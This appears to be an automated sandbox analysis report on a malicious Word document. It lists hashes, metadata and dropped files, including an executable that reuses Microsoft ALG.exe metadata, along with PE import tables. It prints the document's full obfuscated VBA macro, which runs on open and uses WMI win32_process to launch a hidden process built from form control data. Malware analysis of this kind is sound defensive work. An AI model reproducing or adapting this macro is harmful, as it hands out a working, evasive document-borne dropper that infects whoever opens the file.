Remarks
This is a filtered view
This list contains only the embedded files, downloaded files, and dropped files
There are no files for this filter
There are no files in this analysis
|
Filename
|
Category
|
Type
|
Severity
|
Actions
|
|
Mime Type
|
application/msword
|
|
File Size
|
296.43 KB
|
|
MD5
|
2a14b3778299e0f147f8d6e93ad1fa4f
|
|
SHA1
|
2b4ab607f4cc2ba39d223ad27203d7bac4a3c4c2
|
|
SHA256
|
0c23d02d9bdfeff59ce2b2af56e357be4dcef9a08d157a380599d305dcb9ea44
|
|
SSDeep
|
6144:90Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+NXdxypi8wgHOHK20ujA6gNuzp:90E3dxtR/iU9mvUPrx98wgHOHK20ujA0
|
|
ImpHash
|
None
|
|
Parser Error Remark
|
Static engine was unable to completely parse the analyzed file
|
|
Title
|
Eaque.
|
|
Creator
|
Romain Lambert
|
|
Revision
|
1
|
|
Create Time
|
2020-01-21 17:53:00+00:00
|
|
Modify Time
|
2020-01-21 17:53:00+00:00
|
|
Codepage
|
ANSI_Latin1
|
|
Application
|
Microsoft Office Word
|
|
App Version
|
16.0
|
|
Template
|
Normal.dotm
|
|
Document Security
|
NONE
|
|
Page Count
|
1
|
|
Line Count
|
1
|
|
Paragraph Count
|
1
|
|
Word Count
|
4
|
|
Character Count
|
28
|
|
Chars With Spaces
|
31
|
|
scale_crop
|
False
|
|
shared_doc
|
False
|
|
CLSID
|
Control Name
|
Associated Vulnerability
|
|
{00020906-0000-0000-C000-000000000046}
|
Word97
|
-
|
|
{6E182020-F460-11CE-9BCD-00AA00608E01}
|
FormsFrame
|
-
|
Attribute VB_Name = "Halpaohsi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Phffmgfhyakn
End Sub
|
Attribute VB_Name = "Tslcncqezxxw"
Function Cxwtfasbi()
For Ummppcjymvmfw = rgfasd To Mbeqdzhakotiy
ewr = dsf - CVar(er * 23)
Ozuiphpxdsni = CSng(Qrwnlqfsd)
Nmbbvukqshnko = CLng(Wdbxpruutww)
Next
If er > Rowwwmbvov Then
gggs = Sin(3)
Crtydgixxtbqg = Srhezzyzd
Obosihuynzb = CByte(8 - CSng(3))
End If
If sdf > Qoxoxmfqohi Then
wer3 = Sin(1)
Rizesqnmr = Fluwhufrur
Bjbqfaaufo = CByte(234 - CSng(3))
End If
For Lzjhkjdzioj = rgfasd To Jitbrjpcxxuq
ewr = dsf - CDbl(er * 23)
Mrldqjdkh = CSng(Glnpbnapywrgt)
Mnoboqlbr = CLng(Ksdpybickxbnw)
Next
Psyxizhgdtcsr = I + ChrW(wdKeyP)
For Haeiuvmwpueta = rgfasd To Arbtkeldv
ewr = dsf - CVar(er * 23)
Hiccshwszmljt = CSng(Fujgvdcvsutfz)
Xjywoetnbxxhl = CLng(Ihllyquooue)
Next
If er > Izbxxepbkx Then
gggs = Sin(3)
Lhhiywradmlu = Fcukckrjebwzk
Nxjrqnimf = CByte(8 - CSng(3))
End If
If sdf > Mmhwnhjbymhav Then
wer3 = Sin(1)
Cdfmzmku = Cdwiwqouexe
Ooqiitfwo = CByte(234 - CSng(3))
End If
For Kfgsqlcrrhl = rgfasd To Scwsgrmzau
ewr = dsf - CDbl(er * 23)
Idbbksnwjyqjw = CSng(Unkbckdpgwnq)
Njlouhiaphoy = CLng(Ulnwcysm)
Next
Xgnhnban = Psyxizhgdtcsr + Xvzwvdjxjbaph.Dmhwktuoqw + Xvzwvdjxjbaph.Mspgvegbrck
For Rvikdnfkowx = rgfasd To Pexrfnlrx
ewr = dsf - CVar(er * 23)
Zkbugpnmcl = CSng(Fgwgodgxxm)
Oceredxtuxksl = CLng(Yjkztktr)
Next
If er > Gwoqdombd Then
gggs = Sin(3)
Lvhzokpi = Vdzinmnqm
Tjyhjdriyr = CByte(8 - CSng(3))
End If
If sdf > Znocaeaej Then
wer3 = Sin(1)
Lsoiqbzl = Trmjrfhyzx
Zauzknlmqbe = CByte(234 - CSng(3))
End If
For Ouubhzfqsg = rgfasd To Siztfjrq
ewr = dsf - CDbl(er * 23)
Onqrmzevrnhx = CSng(Mxsyhxgtzy)
Mtksnonv = CLng(Kpnflxoit)
Next
sss = Xvzwvdjxjbaph.Srghtmcdobug.GroupName
Hsiszpxdwvzre = Split(Xgnhnban + CStr(Trim(sss)), "=mmuusns=")
For Nfkmwqidjzol = rgfasd To Myxgwvdlvca
ewr = dsf - CVar(er * 23)
Cmpcqnaabwc = CSng(Okukbnajspyqw)
Ckimrzgruwx = CLng(Olcvaxgtq)
Next
If er > Meijwqlu Then
gggs = Sin(3)
Xroqozisan = Tuhndpzlxly
Nqwudkccxqtne = CByte(8 - CSng(3))
End If
If sdf > Xaqxvylncjnwu Then
wer3 = Sin(1)
Msgrajmywc = Veozzccnwv
Bcdulqoisl = CByte(234 - CSng(3))
End If
For Hmmolctu = rgfasd To Pjnjnuswoq
ewr = dsf - CDbl(er * 23)
Qyfsngotujzn = CSng(Qnbubgtpmu)
Ctpvwnjn = CLng(Itpngzrfjar)
Next
Cxwtfasbi = Join(Hsiszpxdwvzre, "")
For Hacdoyen = rgfasd To Wpojmowng
ewr = dsf - CVar(er * 23)
Vbahfauijsvq = CSng(Mlxwizrpyfmr)
Vrrldgmybw = CLng(Kfcpazorzcyqx)
Next
If er > Gcvuopin Then
gggs = Sin(3)
Kmsfnkbn = Mmjenctmttb
Cgwgbuicsk = CByte(8 - CSng(3))
End If
If sdf > Mvllswcmdqt Then
wer3 = Sin(1)
Hlvvtyzwbqz = Ztcmucuo
Haaxybhmm = CByte(234 - CSng(3))
End If
For Uimgymptkfm = rgfasd To Wijrwrzcgeo
ewr = dsf - CDbl(er * 23)
Bavudnppflpg = CSng(Evpbvgmaqsp)
Cmodykflpyqb = CLng(Yrxukzavh)
Next
End Function
Function Phffmgfhyakn()
dv = "in=mmuusns==mmuusns==mmuusns=mgm=mmuusns==mmuusns==mmuusns=t" + ChrW(wdKeyS) + ":=mmuusns==mmuusns=win=mmuusns==mmuusns=32=mmuusns==mmuusns=_" + Xvzwvdjxjbaph.Rghedtey + "r=mmuusns==mmuusns=oc=mmuusns==mmuusns==mmuusns=ess=mmuusns==mmuusns="
For Irhevqhybvg = rgfasd To Hhsopmqko
ewr = dsf - CVar(er * 23)
Gqorawher = CSng(Akmkjqycb)
Ftjcvmavdu = CLng(Xebpxfoc)
Next
If er > Bhhbfdzmlwuvk Then
gggs = Sin(3)
Ybudwflhk = Hbaxnkhhr
Ugxvriwfbtgh = CByte(8 - CSng(3))
End If
If sdf > Tyisqaxl Then
wer3 = Sin(1)
Ylojknddfchng = Dkenlatatum
Bbxigbxfunv = CByte(234 - CSng(3))
End If
For Dbwwfrhenpt = rgfasd To Uelupxopcdf
ewr = dsf - CDbl(er * 23)
Fdiixjzvx = CSng(Xourjome)
Gsuayxaabxry = CLng(Eweskxtxmh)
Next
fd = "=mmuusns="
For Ioqelyua = rgfasd To Iltypfpqhc
ewr = dsf - CVar(er * 23)
Czlgcqoovlkq = CSng(Maqsbzzgnbm)
Zzkomcpm = CLng(Ewemunwacryt)
Next
If er > Oaxtvmkuhmppk Then
gggs = Sin(3)
Nrdvhlwxnetra = Ffkkzlfw
Ikpsweczc = CByte(8 - CSng(3))
End If
If sdf > Uxhosdkpcvkkd Then
wer3 = Sin(1)
Fzxniunrya = Qzrryvdkh
Hhvhojyallnzc = CByte(234 - CSng(3))
End If
For Gfhginlxtpl = rgfasd To Pawccdpfnn
ewr = dsf - CDbl(er * 23)
Zauudzoqj = CSng(Cbujwjbrdgnll)
Wzlisriyim = CLng(Qpwmbabu)
Next
Jmtxjlisob = Split("=mmuusns==mmuusns==mmuusns==mmuusns==mmuusns=w" + dv + T, fd)
For Fqyzinoym = rgfasd To Pultigwfb
ewr = dsf - CVar(er * 23)
Uvilpzyvlnj = CSng(Eynhnfqvqvjr)
Afskklpwdqwx = CLng(Qztgcspk)
Next
If er > Svfuezzutfy Then
gggs = Sin(3)
Dygdivwkpqqf = Cpdeqnes
Vsdrcejca = CByte(8 - CSng(3))
End If
If sdf > Hvogovdcfoo Then
wer3 = Sin(1)
Wfpbicnlkaiqr = Kgoeilvtpx
Apjqgegvwpiu = CByte(234 - CSng(3))
End If
For Fxugqwpusyak = rgfasd To Bladgknwak
ewr = dsf - CDbl(er * 23)
Lklvytgpgy = CSng(Hecfwlqwa)
Lpfnogiwkfel = CLng(Wagepfcmrv)
Next
Mbxypfjaagzo = Join(Jmtxjlisob, "")
For Fgpbircvm = rgfasd To Fmsrpghx
ewr = dsf - CVar(er * 23)
Vuhylhkc = CSng(Zbhvwkzbssq)
Qtqshshb = CLng(Eklhdwjs)
Next
If er > Tddfxufhgfm Then
gggs = Sin(3)
Qrfvpckqotyck = Weiaxikm
Umnavartnu = CByte(8 - CSng(3))
End If
If sdf > Atpizekfcmjck Then
wer3 = Sin(1)
Lnogfpkvqwqtt = Xqmydplpjf
Iidlptdfgz = CByte(234 - CSng(3))
End If
For Jqyzmjlqyt = rgfasd To Pmxhzxebdebm
ewr = dsf - CDbl(er * 23)
Azpacydcpn = CSng(Datllptkvc)
Fjulgeolmbila = CLng(Qpmxkqnteis)
Next
Set Nbjlfulfh = GetObject(Mbxypfjaagzo)
For Dlaqwtsa = rgfasd To Xedfhncc
ewr = dsf - CVar(er * 23)
Nszuzkhonwyb = CSng(Esmykmztsyfik)
Jlmjomkmgrm = CLng(Mzgwzdbp)
Next
If er > Susuaaoq Then
gggs = Sin(3)
Ydklspmt = Hxbwgssjj
Aihuowsk = CByte(8 - CSng(3))
End If
If sdf > Bmhejovdjrhj Then
wer3 = Sin(1)
Utwoiiehucyvd = Tujvnglt
Dxgzpurnlzvzd = CByte(234 - CSng(3))
End If
For Otsfgnle = rgfasd To Wxohpjzfrel
ewr = dsf - CDbl(er * 23)
Ehgirqiuq = CSng(Zmtokjrsgjsw)
Vqwtmxrpl = CLng(Afunrvgqvicpk)
Next
Epuodgcp = Xvzwvdjxjbaph.Qgnmwpcsosft.Tag
Nwlspbgev = Mbxypfjaagzo + ChrW(wdKeyS) + Xvzwvdjxjbaph.Hmqtdcvzqfs.Tag + Epuodgcp
For Jznxrrsnztkw = rgfasd To Icwwpescgsond
ewr = dsf - CVar(er * 23)
Erxqtqfhjlgio = CSng(Rongvkdbb)
Hsvjeocpvcmgh = CLng(Unliveda)
Next
If er > Zxtnbpwktjmmz Then
gggs = Sin(3)
Fyddfifxsppq = Vdrvjeqicu
Voyqineppgz = CByte(8 - CSng(3))
End If
If sdf > Rtabxlzczygu Then
wer3 = Sin(1)
Ccxvjromryb = Mdupeuar
Geinnwqsvrw = CByte(234 - CSng(3))
End If
For Skqfgfcbaqk = rgfasd To Fibaqzrlqqada
ewr = dsf - CDbl(er * 23)
Ffpekqbe = CSng(Tlhogoyaorh)
Bxjbctpbgpbw = CLng(Fciddnlx)
Next
Fhmdqkvcai = Nwlspbgev + Xvzwvdjxjbaph.Rghedtey
For Lazvwlklomuqv = rgfasd To Bfspfsvlezbl
ewr = dsf - CVar(er * 23)
Djsngryqnjtae = CSng(Oiegnsfwcze)
Uwuaonkcccp = CLng(Lsjvfoyypqxe)
Next
If er > Ynpocckwr Then
gggs = Sin(3)
Mrmkmfpwshnm = Pqqefxvfhmpm
Ilpbuctxmnc = CByte(8 - CSng(3))
End If
If sdf > Hqxkajuml Then
wer3 = Sin(1)
Lrxgjauarbo = Msdasecbtpnp
Pcubwrxp = CByte(234 - CSng(3))
End If
For Moltcugti = rgfasd To Ifttgrprbkqyy
ewr = dsf - CDbl(er * 23)
Xarpuxozndsjz = CSng(Ugfdhwahqz)
Buwpnoewfbtka = CLng(Gqniqrspk)
Next
Set Phffmgfhyakn = GetObject(Fhmdqkvcai)
For Pudwquipw = rgfasd To Twkbeeebb
ewr = dsf - CVar(er * 23)
Ujelxdldnb = CSng(Mdvwekrpwmxwg)
Gqygnvgaure = CLng(Dsnfyyxxi)
Next
If er > Rjumimhfpmemp Then
gggs = Sin(3)
Dfdbfannl = Ryhjtxiypdaus
Ygrzfxjqvr = CByte(8 - CSng(3))
End If
If sdf > Czdwihiuj Then
wer3 = Sin(1)
Theqgdcll = Bgvmybihmszq
Lhsmjmabayrbh = CByte(234 - CSng(3))
End If
For Sgiohxwawj = rgfasd To Bkntqyquwk
ewr = dsf - CDbl(er * 23)
Guagwuxt = CSng(Umrcycpgwdca)
Mfbdrjqhhfh = CLng(Qdblnhgqbcozo)
Next
Phffmgfhyakn. _
showwindow = False
For Egpwnmsp = rgfasd To Nziwmlcoxazlv
ewr = dsf - CVar(er * 23)
Dlzspewhcf = CSng(Nucpbesqtki)
Qnsmbtkrlk = CLng(Xftrsgrexptv)
Next
If er > Hchrsdrjzrdva Then
gggs = Sin(3)
Xbkcwdyzzaerd = Txacliku
Angcnxffhzojt = CByte(8 - CSng(3))
End If
If sdf > Jdhqnloxyxfu Then
wer3 = Sin(1)
Pmgsewqrwmdzl = Mjemhcecdd
Qiehdggsmh = CByte(234 - CSng(3))
End If
For Rergvnoatkm = rgfasd To Hrwkkdpt
ewr = dsf - CDbl(er * 23)
Jreasfdzetqvc = CSng(Hqplsfvqgvpji)
Bvhehprnv = CLng(Livkmolmdma)
Next
Do While Nbjlfulfh. _
Create(er & Cxwtfasbi, Ttfwoikclybkw, Phffmgfhyakn, Anrwyrkpnf)
Loop
For Prlhuwaksj = rgfasd To Rzvqamgzdxk
ewr = dsf - CVar(er * 23)
Eyhuwmtjqih = CSng(Vlydskeg)
Lodfalishvsq = CLng(Pvxzearoearu)
Next
If er > Fzmjugwf Then
gggs = Sin(3)
Sxiqzqifo = Wmfbjbwkdog
Nhiivrvkc = CByte(8 - CSng(3))
End If
If sdf > Gsbonslgu Then
wer3 = Sin(1)
Nhhlezvpr = Zcsizjxkcuv
Qaiwkczpvfub = CByte(234 - CSng(3))
End If
For Mvomzustyw = rgfasd To Bjjjnsimuerz
ewr = dsf - CDbl(er * 23)
Myexxgyzkpo = CSng(Ecxcmqraqflr)
Ppiephkhuoby = CLng(Cyuvewejxcfi)
Next
End Function
|
|
Mime Type
|
application/CDFV2
|
|
File Size
|
1.50 KB
|
|
MD5
|
72f5c05b7ea8dd6059bf59f50b22df33
|
|
SHA1
|
d5af52e129e15e3a34772806f6c5fbf132e7408e
|
|
SHA256
|
1dc0c8d7304c177ad0e74d3d2f1002eb773f4b180685a7df6bbe75ccc24b0164
|
|
SSDeep
|
3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
|
|
ImpHash
|
None
|
|
Severity
|
|
|
First Seen
|
2013-03-17 16:11 (UTC+1)
|
|
Last Seen
|
2019-02-22 02:24 (UTC+1)
|
|
Also Known As
|
c:\users\aetadzjz\appdata\local\temp\~df1fc9d1914fcb9da0.tmp (Dropped File)
|
|
Mime Type
|
application/octet-stream
|
|
File Size
|
512 Bytes
|
|
MD5
|
bf619eac0cdf3f68d496ea9344137e8b
|
|
SHA1
|
5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5
|
|
SHA256
|
076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560
|
|
SSDeep
|
3::
|
|
ImpHash
|
None
|
|
Severity
|
|
|
First Seen
|
2011-07-06 01:20 (UTC+2)
|
|
Last Seen
|
2019-12-06 01:08 (UTC+1)
|
|
Also Known As
|
C:\Users\aETAdzjz\AppData\Local\sendduck\sendducka.exe (Dropped File)
|
|
Mime Type
|
application/vnd.microsoft.portable-executable
|
|
File Size
|
77.50 KB
|
|
MD5
|
3290d6946b5e30e70414990574883ddb
|
|
SHA1
|
be0144e3235ffde0787e9f1cd34c828ec87d8e19
|
|
SHA256
|
0e9294e1991572256b3cda6b031db9f39ca601385515ee59f1f601725b889663
|
|
SSDeep
|
1536:4Dfm8/DhQ/65oIFM8oWcwnLUq0Sjw0hkFNaH3:G7Lm/6ohWc4oq0u7kn
|
|
ImpHash
|
1f6cbfb8aa32847b01fd3e7e70d29d61
|
|
Severity
|
|
|
First Seen
|
2012-10-01 02:48 (UTC+2)
|
|
Last Seen
|
2019-12-02 13:40 (UTC+1)
|
|
Image Base
|
0x100000000
|
|
Entry Point
|
0x10000bdfc
|
|
Size Of Code
|
0xf800
|
|
Size Of Initialized Data
|
0x4400
|
|
File Type
|
FileType.executable
|
|
Subsystem
|
Subsystem.windows_gui
|
|
Machine Type
|
MachineType.amd64
|
|
Compile Timestamp
|
2009-07-14 00:08:46+00:00
|
|
CompanyName
|
Microsoft Corporation
|
|
FileDescription
|
Application Layer Gateway Service
|
|
FileVersion
|
6.1.7600.16385 (win7_rtm.090713-1255)
|
|
InternalName
|
ALG.exe
|
|
LegalCopyright
|
© Microsoft Corporation. All rights reserved.
|
|
OriginalFilename
|
ALG.exe
|
|
ProductName
|
Microsoft® Windows® Operating System
|
|
ProductVersion
|
6.1.7600.16385
|
|
Name
|
Virtual Address
|
Virtual Size
|
Raw Data Size
|
Raw Data Offset
|
Flags
|
Entropy
|
|
.text
|
0x100001000
|
0xf7fe
|
0xf800
|
0x400
|
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
|
5.98
|
|
.data
|
0x100011000
|
0xe18
|
0x600
|
0xfc00
|
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
|
2.36
|
|
.pdata
|
0x100012000
|
0xfa8
|
0x1000
|
0x10200
|
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
|
4.58
|
|
.rsrc
|
0x100013000
|
0x1fc8
|
0x2000
|
0x11200
|
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
|
5.5
|
|
.reloc
|
0x100015000
|
0x28a
|
0x400
|
0x13200
|
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
|
2.9
|
|
API Name
|
Ordinal
|
IAT Address
|
Thunk RVA
|
Thunk Offset
|
Hint
|
|
SetServiceStatus
|
0x0
|
0x100001000
|
0xfcf8
|
0xf0f8
|
0x2c0
|
|
RegisterServiceCtrlHandlerW
|
0x0
|
0x100001008
|
0xfd00
|
0xf100
|
0x288
|
|
RegNotifyChangeKeyValue
|
0x0
|
0x100001010
|
0xfd08
|
0xf108
|
0x25d
|
|
RegCloseKey
|
0x0
|
0x100001018
|
0xfd10
|
0xf110
|
0x230
|
|
RegOpenKeyExW
|
0x0
|
0x100001020
|
0xfd18
|
0xf118
|
0x261
|
|
StartServiceCtrlDispatcherW
|
0x0
|
0x100001028
|
0xfd20
|
0xf120
|
0x2c8
|
|
RegQueryValueExW
|
0x0
|
0x100001030
|
0xfd28
|
0xf128
|
0x26e
|
|
RegEnumKeyExW
|
0x0
|
0x100001038
|
0xfd30
|
0xf130
|
0x24f
|
|
SystemFunction036
|
0x0
|
0x100001040
|
0xfd38
|
0xf138
|
0x2f1
|
|
API Name
|
Ordinal
|
IAT Address
|
Thunk RVA
|
Thunk Offset
|
Hint
|
|
CreateEventW
|
0x0
|
0x100001088
|
0xfd80
|
0xf180
|
0x85
|
|
WaitForMultipleObjects
|
0x0
|
0x100001090
|
0xfd88
|
0xf188
|
0x506
|
|
Sleep
|
0x0
|
0x100001098
|
0xfd90
|
0xf190
|
0x4c0
|
|
HeapSetInformation
|
0x0
|
0x1000010a0
|
0xfd98
|
0xf198
|
0x2db
|
|
WaitForSingleObject
|
0x0
|
0x1000010a8
|
0xfda0
|
0xf1a0
|
0x508
|
|
SetEvent
|
0x0
|
0x1000010b0
|
0xfda8
|
0xf1a8
|
0x467
|
|
CreateThread
|
0x0
|
0x1000010b8
|
0xfdb0
|
0xf1b0
|
0xb4
|
|
CreateTimerQueueTimer
|
0x0
|
0x1000010c0
|
0xfdb8
|
0xf1b8
|
0xbc
|
|
DeleteTimerQueueTimer
|
0x0
|
0x1000010c8
|
0xfdc0
|
0xf1c0
|
0xdb
|
|
GetCurrentProcessId
|
0x0
|
0x1000010d0
|
0xfdc8
|
0xf1c8
|
0x1c7
|
|
DuplicateHandle
|
0x0
|
0x1000010d8
|
0xfdd0
|
0xf1d0
|
0xec
|
|
GetCurrentProcess
|
0x0
|
0x1000010e0
|
0xfdd8
|
0xf1d8
|
0x1c6
|
|
RaiseException
|
0x0
|
0x1000010e8
|
0xfde0
|
0xf1e0
|
0x3b4
|
|
EnterCriticalSection
|
0x0
|
0x1000010f0
|
0xfde8
|
0xf1e8
|
0xf2
|
|
LeaveCriticalSection
|
0x0
|
0x1000010f8
|
0xfdf0
|
0xf1f0
|
0x33b
|
|
WriteFile
|
0x0
|
0x100001100
|
0xfdf8
|
0xf1f8
|
0x534
|
|
ReadFile
|
0x0
|
0x100001108
|
0xfe00
|
0xf200
|
0x3c3
|
|
BindIoCompletionCallback
|
0x0
|
0x100001110
|
0xfe08
|
0xf208
|
0x39
|
|
CloseHandle
|
0x0
|
0x100001118
|
0xfe10
|
0xf210
|
0x52
|
|
GetProcessHeap
|
0x0
|
0x100001120
|
0xfe18
|
0xf218
|
0x251
|
|
HeapAlloc
|
0x0
|
0x100001128
|
0xfe20
|
0xf220
|
0x2d3
|
|
UnhandledExceptionFilter
|
0x0
|
0x100001130
|
0xfe28
|
0xf228
|
0x4e2
|
|
TerminateProcess
|
0x0
|
0x100001138
|
0xfe30
|
0xf230
|
0x4ce
|
|
GetSystemTimeAsFileTime
|
0x0
|
0x100001140
|
0xfe38
|
0xf238
|
0x280
|
|
GetCurrentThreadId
|
0x0
|
0x100001148
|
0xfe40
|
0xf240
|
0x1cb
|
|
GetTickCount
|
0x0
|
0x100001150
|
0xfe48
|
0xf248
|
0x29a
|
|
QueryPerformanceCounter
|
0x0
|
0x100001158
|
0xfe50
|
0xf250
|
0x3a9
|
|
GetModuleHandleW
|
0x0
|
0x100001160
|
0xfe58
|
0xf258
|
0x21e
|
|
SetUnhandledExceptionFilter
|
0x0
|
0x100001168
|
0xfe60
|
0xf260
|
0x4b3
|
|
GetStartupInfoW
|
0x0
|
0x100001170
|
0xfe68
|
0xf268
|
0x26a
|
|
InitializeCriticalSection
|
0x0
|
0x100001178
|
0xfe70
|
0xf270
|
0x2ea
|
|
DeleteCriticalSection
|
0x0
|
0x100001180
|
0xfe78
|
0xf278
|
0xd2
|
|
DeleteTimerQueueEx
|
0x0
|
0x100001188
|
0xfe80
|
0xf280
|
0xda
|
|
CreateTimerQueue
|
0x0
|
0x100001190
|
0xfe88
|
0xf288
|
0xbb
|
|
GetLastError
|
0x0
|
0x100001198
|
0xfe90
|
0xf290
|
0x208
|
|
HeapFree
|
0x0
|
0x1000011a0
|
0xfe98
|
0xf298
|
0x2d7
|
|
API Name
|
Ordinal
|
IAT Address
|
Thunk RVA
|
Thunk Offset
|
Hint
|
|
_unlock
|
0x0
|
0x100001260
|
0xff58
|
0xf358
|
0x330
|
|
_lock
|
0x0
|
0x100001268
|
0xff60
|
0xf360
|
0x1d5
|
|
?terminate@@YAXXZ
|
0x0
|
0x100001270
|
0xff68
|
0xf368
|
0x30
|
|
memset
|
0x0
|
0x100001278
|
0xff70
|
0xf370
|
0x484
|
|
_onexit
|
0x0
|
0x100001280
|
0xff78
|
0xf378
|
0x27f
|
|
??1type_info@@UEAA@XZ
|
0x0
|
0x100001288
|
0xff80
|
0xf380
|
0x12
|
|
__dllonexit
|
0x0
|
0x100001290
|
0xff88
|
0xf388
|
0x6d
|
|
__set_app_type
|
0x0
|
0x100001298
|
0xff90
|
0xf390
|
0x80
|
|
_fmode
|
0x0
|
0x1000012a0
|
0xff98
|
0xf398
|
0x118
|
|
__setusermatherr
|
0x0
|
0x1000012a8
|
0xffa0
|
0xf3a0
|
0x82
|
|
_amsg_exit
|
0x0
|
0x1000012b0
|
0xffa8
|
0xf3a8
|
0xa0
|
|
_initterm
|
0x0
|
0x1000012b8
|
0xffb0
|
0xf3b0
|
0x16c
|
|
_wcmdln
|
0x0
|
0x1000012c0
|
0xffb8
|
0xf3b8
|
0x371
|
|
exit
|
0x0
|
0x1000012c8
|
0xffc0
|
0xf3c0
|
0x420
|
|
_cexit
|
0x0
|
0x1000012d0
|
0xffc8
|
0xf3c8
|
0xb3
|
|
_exit
|
0x0
|
0x1000012d8
|
0xffd0
|
0xf3d0
|
0xff
|
|
_XcptFilter
|
0x0
|
0x1000012e0
|
0xffd8
|
0xf3d8
|
0x52
|
|
__C_specific_handler
|
0x0
|
0x1000012e8
|
0xffe0
|
0xf3e0
|
0x53
|
|
__wgetmainargs
|
0x0
|
0x1000012f0
|
0xffe8
|
0xf3e8
|
0x8f
|
|
__CxxFrameHandler3
|
0x0
|
0x1000012f8
|
0xfff0
|
0xf3f0
|
0x57
|
|
_callnewh
|
0x0
|
0x100001300
|
0xfff8
|
0xf3f8
|
0xb1
|
|
malloc
|
0x0
|
0x100001308
|
0x10000
|
0xf400
|
0x474
|
|
_CxxThrowException
|
0x0
|
0x100001310
|
0x10008
|
0xf408
|
0x4c
|
|
??0exception@@QEAA@AEBQEBDH@Z
|
0x0
|
0x100001318
|
0x10010
|
0xf410
|
0xb
|
|
memmove
|
0x0
|
0x100001320
|
0x10018
|
0xf418
|
0x482
|
|
realloc
|
0x0
|
0x100001328
|
0x10020
|
0xf420
|
0x497
|
|
??0exception@@QEAA@XZ
|
0x0
|
0x100001330
|
0x10028
|
0xf428
|
0xd
|
|
memmove_s
|
0x0
|
0x100001338
|
0x10030
|
0xf430
|
0x483
|
|
memcpy_s
|
0x0
|
0x100001340
|
0x10038
|
0xf438
|
0x481
|
|
_wcsicmp
|
0x0
|
0x100001348
|
0x10040
|
0xf440
|
0x379
|
|
free
|
0x0
|
0x100001350
|
0x10048
|
0xf448
|
0x43a
|
|
?what@exception@@UEBAPEBDXZ
|
0x0
|
0x100001358
|
0x10050
|
0xf450
|
0x32
|
|
??0exception@@QEAA@AEBV0@@Z
|
0x0
|
0x100001360
|
0x10058
|
0xf458
|
0xc
|
|
isdigit
|
0x0
|
0x100001368
|
0x10060
|
0xf460
|
0x454
|
|
??1exception@@UEAA@XZ
|
0x0
|
0x100001370
|
0x10068
|
0xf468
|
0x11
|
|
??0exception@@QEAA@AEBQEBD@Z
|
0x0
|
0x100001378
|
0x10070
|
0xf470
|
0xa
|
|
_commode
|
0x0
|
0x100001380
|
0x10078
|
0xf478
|
0xc4
|
|
memcpy
|
0x0
|
0x100001388
|
0x10080
|
0xf480
|
0x480
|
|
API Name
|
Ordinal
|
IAT Address
|
Thunk RVA
|
Thunk Offset
|
Hint
|
|
(by ordinal)
|
0x11
|
0x100001050
|
0xfd48
|
0xf148
|
-
|
|
(by ordinal)
|
0x10
|
0x100001058
|
0xfd50
|
0xf150
|
-
|
|
(by ordinal)
|
0x20
|
0x100001060
|
0xfd58
|
0xf158
|
-
|
|
(by ordinal)
|
0x17
|
0x100001068
|
0xfd60
|
0xf160
|
-
|
|
(by ordinal)
|
0x14
|
0x100001070
|
0xfd68
|
0xf168
|
-
|
|
(by ordinal)
|
0x15
|
0x100001078
|
0xfd70
|
0xf170
|
-
|
|
API Name
|
Ordinal
|
IAT Address
|
Thunk RVA
|
Thunk Offset
|
Hint
|
|
htons
|
0x9
|
0x1000011c8
|
0xfec0
|
0xf2c0
|
-
|
|
getpeername
|
0x5
|
0x1000011d0
|
0xfec8
|
0xf2c8
|
-
|
|
getsockname
|
0x6
|
0x1000011d8
|
0xfed0
|
0xf2d0
|
-
|
|
bind
|
0x2
|
0x1000011e0
|
0xfed8
|
0xf2d8
|
-
|
|
WSASocketW
|
0x0
|
0x1000011e8
|
0xfee0
|
0xf2e0
|
0x53
|
|
socket
|
0x17
|
0x1000011f0
|
0xfee8
|
0xf2e8
|
-
|
|
closesocket
|
0x3
|
0x1000011f8
|
0xfef0
|
0xf2f0
|
-
|
|
ntohs
|
0xf
|
0x100001200
|
0xfef8
|
0xf2f8
|
-
|
|
WSAIoctl
|
0x0
|
0x100001208
|
0xff00
|
0xf300
|
0x36
|
|
listen
|
0xd
|
0x100001210
|
0xff08
|
0xf308
|
-
|
|
htonl
|
0x8
|
0x100001218
|
0xff10
|
0xf310
|
-
|
|
setsockopt
|
0x15
|
0x100001220
|
0xff18
|
0xf318
|
-
|
|
WSAStartup
|
0x73
|
0x100001228
|
0xff20
|
0xf320
|
-
|
|
WSACleanup
|
0x74
|
0x100001230
|
0xff28
|
0xf328
|
-
|
|
WSAGetLastError
|
0x6f
|
0x100001238
|
0xff30
|
0xf330
|
-
|
|
API Name
|
Ordinal
|
IAT Address
|
Thunk RVA
|
Thunk Offset
|
Hint
|
|
CoTaskMemFree
|
0x0
|
0x1000013b8
|
0x100b0
|
0xf4b0
|
0x6c
|
|
CoTaskMemAlloc
|
0x0
|
0x1000013c0
|
0x100b8
|
0xf4b8
|
0x6b
|
|
CoUninitialize
|
0x0
|
0x1000013c8
|
0x100c0
|
0xf4c0
|
0x70
|
|
CoInitializeEx
|
0x0
|
0x1000013d0
|
0x100c8
|
0xf4c8
|
0x43
|
|
CLSIDFromString
|
0x0
|
0x1000013d8
|
0x100d0
|
0xf4d0
|
0xc
|
|
CoCreateInstance
|
0x0
|
0x1000013e0
|
0x100d8
|
0xf4d8
|
0x14
|
|
API Name
|
Ordinal
|
IAT Address
|
Thunk RVA
|
Thunk Offset
|
Hint
|
|
SysAllocString
|
0x2
|
0x1000011b0
|
0xfea8
|
0xf2a8
|
-
|
|
SysFreeString
|
0x6
